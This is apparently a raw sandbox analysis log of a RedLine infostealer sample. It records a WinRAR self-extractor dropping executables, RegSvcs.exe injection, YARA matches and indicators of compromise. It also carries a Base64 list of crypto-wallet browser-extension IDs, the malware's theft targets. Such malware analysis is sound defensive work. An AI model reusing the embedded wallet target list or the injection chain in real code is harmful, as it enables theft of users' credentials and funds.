Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B8D8EE	0_2_00B8D8EE
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6286B	0_2_00B6286B
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6E9B7	0_2_00B6E9B7
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B919F4	0_2_00B919F4
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B73E0B	0_2_00B73E0B
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B84F9A	0_2_00B84F9A
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B6EFE2	0_2_00B6EFE2
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00195140	1_2_00195140
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001A616E	1_2_001A616E
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001A7209	1_2_001A7209
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001992E0	1_2_001992E0
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001A6CC7	1_2_001A6CC7
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0019F560	1_2_0019F560
Source: C:\Windows\Temp\123.exe	Code function: 1_2_0019D5FA	1_2_0019D5FA
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001AEE35	1_2_001AEE35
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0138616E	2_2_0138616E
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01375140	2_2_01375140
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01404180	2_2_01404180
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013EB060	2_2_013EB060
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013EB890	2_2_013EB890
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01415B20	2_2_01415B20
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013E63D0	2_2_013E63D0
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01387209	2_2_01387209
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013E62A0	2_2_013E62A0
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013792E0	2_2_013792E0
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0141CD40	2_2_0141CD40
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0144DD71	2_2_0144DD71
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0137F560	2_2_0137F560
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0137D5FA	2_2_0137D5FA
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01386CC7	2_2_01386CC7
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013E07C0	2_2_013E07C0
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0138EE35	2_2_0138EE35
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013A7620	2_2_013A7620
Source: C:\Windows\Temp\321.exe	Code function: 2_2_014056D0	2_2_014056D0

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\re.exe 53D0BC467AAD4AC95C9655617B34E3859D0BEBA1D80167B4E8A697AA0FEC0B3B

Source: 1JCAVkYU3U.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.3.123.exe.c90000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.1c3a80.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.1c3a80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.123.exe.190000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

File deleted: C:\Windows\Temp\__tmp_rar_sfx_access_check_4861921

Jump to behavior

Source: C:\Windows\Temp\321.exe	Code function: String function: 013786F0 appears 43 times
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: String function: 00B7EC50 appears 56 times
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: String function: 00B7F5F0 appears 31 times
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: String function: 00B7EB78 appears 39 times
Source: C:\Windows\Temp\123.exe	Code function: String function: 001986F0 appears 48 times

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B66FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00B66FAA

Source: 1JCAVkYU3U.exe

Static PE information: invalid certificate

Source: re.exe.6.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1JCAVkYU3U.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Local\Yandex

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/18@2/4

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B66C74 GetLastError,FormatMessageW,

0_2_00B66C74

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Code function: 0_2_00B7A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00B7A6C2

Source: 1JCAVkYU3U.exe	ReversingLabs: Detection: 45%
Source: 1JCAVkYU3U.exe	Virustotal: Detection: 30%

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

File read: C:\Users\user\Desktop\1JCAVkYU3U.exe

Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\1JCAVkYU3U.exe C:\Users\user\Desktop\1JCAVkYU3U.exe
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5180 -s 232
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 220
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\123.exe "C:\Windows\Temp\123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Process created: C:\Windows\Temp\321.exe "C:\Windows\Temp\321.exe"	Jump to behavior
Source: C:\Windows\Temp\123.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior
Source: C:\Windows\Temp\321.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Jump to behavior

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

File created: C:\Windows\Temp\__tmp_rar_sfx_access_check_4861921

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: 1.3.123.exe.c90000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
Source: 3.2.RegSvcs.exe.400000.0.unpack, BrEx.cs	Base64 encoded string: 'ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8WW9yb2lXYWxsZXQKaWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8VHJvbmxpbmsKamJkYW9jbmVpaWlubWpiamxnYWxoY2VsZ2Jlam1uaWR8TmlmdHlXYWxsZXQKbmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58TWV0YW1hc2sKYWZiY2JqcGJwZmFkbGttaG1jbGhrZWVvZG1hbWNmbGN8TWF0aFdhbGxldApobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHxDb2luYmFzZQpmaGJvaGltYWVsYm9ocGpiYmxkY25nY25hcG5kb2RqcHxCaW5hbmNlQ2hhaW4Kb2RiZnBlZWloZGtiaWhtb3BrYmptb29uZmFubGJmY2x8QnJhdmVXYWxsZXQKaHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58R3VhcmRhV2FsbGV0CmJsbmllaWlmZmJvaWxsa25qbmVwb2dqaGtnbm9hcGFjfEVxdWFsV2FsbGV0CmNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfEpheHh4TGliZXJ0eQpmaWhrYWtmb2JrbWtqb2pwY2hwZmdjbWhmam5tbmZwaXxCaXRBcHBXYWxsZXQKa25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8aVdhbGxldAphbWttamptbWZsZGRvZ21ocGpsb2ltaXBib2ZuZmppaHxXb21iYXQKZmhpbGFoZWltZ2xpZ25kZGtqZ29ma2NiZ2VraGVuYmh8QXRvbWljV2FsbGV0Cm5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfE1ld0N4Cm5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfEd1aWxkV2FsbGV0Cm5rZGRnbmNkamdqZmNkZGFtZmdjbWZubGhjY25pbWlnfFNhdHVybldhbGxldApmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5152
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\SmartLoader401
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5180
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_01

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Command line argument: sfxname	0_2_00B7DF1E
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Command line argument: sfxstime	0_2_00B7DF1E
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Command line argument: STARTDLG	0_2_00B7DF1E

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 1JCAVkYU3U.exe

Static file information: File size 1217709 > 1048576

Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1JCAVkYU3U.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1JCAVkYU3U.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 1JCAVkYU3U.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1JCAVkYU3U.exe

Source: 1JCAVkYU3U.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1JCAVkYU3U.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1JCAVkYU3U.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1JCAVkYU3U.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1JCAVkYU3U.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7F640 push ecx; ret	0_2_00B7F653
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	Code function: 0_2_00B7EB78 push eax; ret	0_2_00B7EB96
Source: C:\Windows\Temp\123.exe	Code function: 1_2_00191F6D push eax; ret	1_2_00192083
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001C4181 push es; ret	1_2_001C41C1
Source: C:\Windows\Temp\123.exe	Code function: 1_2_001981D4 push ecx; ret	1_2_001981E7
Source: C:\Windows\Temp\321.exe	Code function: 2_2_01371F6D push eax; ret	2_2_01372083
Source: C:\Windows\Temp\321.exe	Code function: 2_2_013781D4 push ecx; ret	2_2_013781E7
Source: C:\Windows\Temp\321.exe	Code function: 2_2_0142EA56 push ecx; ret	2_2_0142EA69

Source: 1JCAVkYU3U.exe	Static PE information: section name: .didat
Source: 123.exe.0.dr	Static PE information: section name: .live1
Source: 321.exe.0.dr	Static PE information: section name: .live1

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe

File created: C:\Windows\Temp\__tmp_rar_sfx_access_check_4861921

Jump to behavior

Source: initial sample

Static PE information: section name: .text entropy: 7.038368167533408

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	File created: C:\Windows\Temp\321.exe	Jump to dropped file
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	File created: C:\Windows\Temp\123.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\re.exe	Jump to dropped file

Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	File created: C:\Windows\Temp\321.exe			Jump to dropped file
Source: C:\Users\user\Desktop\1JCAVkYU3U.exe	File created: C:\Windows\Temp\123.exe			Jump to dropped file

